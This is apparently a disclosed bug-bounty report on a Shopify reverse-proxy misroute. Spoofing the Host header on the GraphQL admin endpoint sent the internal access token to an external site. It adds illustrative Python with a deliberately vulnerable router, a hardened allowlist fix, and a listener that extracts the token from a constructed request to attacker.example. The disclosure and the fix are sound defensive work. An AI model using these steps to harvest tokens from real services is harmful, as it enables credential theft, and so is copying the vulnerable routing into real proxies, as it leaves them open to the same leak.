Shopify: Reverse Proxy misroute leading to steal X-Shopify-Access-Token header

ID H1:429617
Type hackerone
Reporter ruvlol
Modified 2019-03-14T10:50:35


Hello Shopify team! I found out that on the /admin/api/graphql endpoint the server fetches the content of the Host header value (${HTTP_Host} + /admin/api/graphql). If my own host is sent to the server, the request comes from ██████████ or ██████████ (your Google Cloud cluster). Also, I can grab all reverse proxy headers, including X-Shopify-Access-Token.

Example of such a request in base64:


It also returns the response your server got from the ${HTTP_Host} + /admin/api/graphql address.

How to reproduce:
1. POST /admin/api/graphql with Host pointing to an external website.
2. As the external website owner, grab the incoming headers.


SSRF, X-Shopify-Access-Token leakage
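The routing mistake the report describes, modelled as an added example (this is illustrative code written for this page, not Shopify's proxy or the reporter's request). The vulnerable routine builds the upstream URL from the client-supplied Host header and attaches the proxy's internal headers, so a request with Host set to an external site delivers X-Shopify-Access-Token to that site; the hardened routine resolves the upstream from a fixed allowlist, rejects absolute request-targets, and drops any client-supplied copy of a proxy-only header before adding its own. A small header parser plays the role of the external site's listener from step 2. The token value, the upstream map, the host names and the captured request are all constructed for the example.

```python
from urllib.parse import urlsplit

# Hypothetical token the edge proxy injects for the internal admin API (constructed).
ACCESS_TOKEN = "shpat_constructed_example_token"

# Hypothetical allowlist mapping public shop hosts to internal upstreams (constructed).
UPSTREAMS = {"example-shop.myshopify.com": "http://10.0.0.5:8080"}

# Headers only the proxy may set on the upstream request; client copies are dropped.
PROXY_ONLY = ("x-shopify-access-token", "x-forwarded-for")


def build_upstream_request_vulnerable(host, path, client_headers, client_ip):
    """Misroute as in the report: upstream = ${HTTP_Host} + path.

    Returns (url, headers). Whatever Host the client sent becomes the destination,
    and the proxy's internal headers, token included, travel with the request.
    """
    headers = dict(client_headers)
    headers["X-Shopify-Access-Token"] = ACCESS_TOKEN
    headers["X-Forwarded-For"] = client_ip
    return "https://" + host + path, headers


def build_upstream_request_hardened(host, path, client_headers, client_ip):
    """Route only to allowlisted upstreams; never let the client choose the host
    or pre-set a proxy-only header. Raises ValueError on anything else."""
    hostname = host.split(":", 1)[0].strip().lower()
    base = UPSTREAMS.get(hostname)
    if base is None:
        raise ValueError("Host not served here: %r" % hostname)
    parts = urlsplit(path)
    if parts.scheme or parts.netloc or not parts.path.startswith("/"):
        raise ValueError("path must be an origin-form request-target: %r" % path)
    headers = {k: v for k, v in client_headers.items() if k.lower() not in PROXY_ONLY}
    headers["X-Shopify-Access-Token"] = ACCESS_TOKEN
    headers["X-Forwarded-For"] = client_ip
    return base + path, headers


def hardened_rejects(host, path):
    """True if the hardened router refuses to build a request for host + path."""
    try:
        build_upstream_request_hardened(host, path, {}, "203.0.113.7")
    except ValueError:
        return True
    return False


def parse_request_headers(raw):
    """What the external site's listener does: split a raw HTTP/1.1 request
    into its request line and a dict of lower-cased header names."""
    head, _, _ = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def leaked_token(raw):
    """Return the X-Shopify-Access-Token value found in a captured request, if any."""
    _, headers = parse_request_headers(raw)
    return headers.get("x-shopify-access-token")


# Constructed: the request as it would arrive at attacker.example after the
# vulnerable proxy followed the client-supplied Host header.
CAPTURED = (
    "POST /admin/api/graphql HTTP/1.1\r\n"
    "Host: attacker.example\r\n"
    "X-Forwarded-For: 203.0.113.7\r\n"
    "X-Shopify-Access-Token: " + ACCESS_TOKEN + "\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    url, hdrs = build_upstream_request_vulnerable(
        "attacker.example", "/admin/api/graphql", {}, "203.0.113.7")
    print("vulnerable routes to", url, "with", hdrs)
    print("listener recovered token:", leaked_token(CAPTURED))
    print("hardened rejects attacker host:", hardened_rejects("attacker.example", "/admin/api/graphql"))
```

The allowlist lookup is the important part: the Host header is attacker-controlled input and must only ever select among upstreams the proxy already knows, never be concatenated into a URL. Stripping client-supplied proxy-only headers is a separate fix that closes the inverse problem (a client forging X-Shopify-Access-Token towards the upstream).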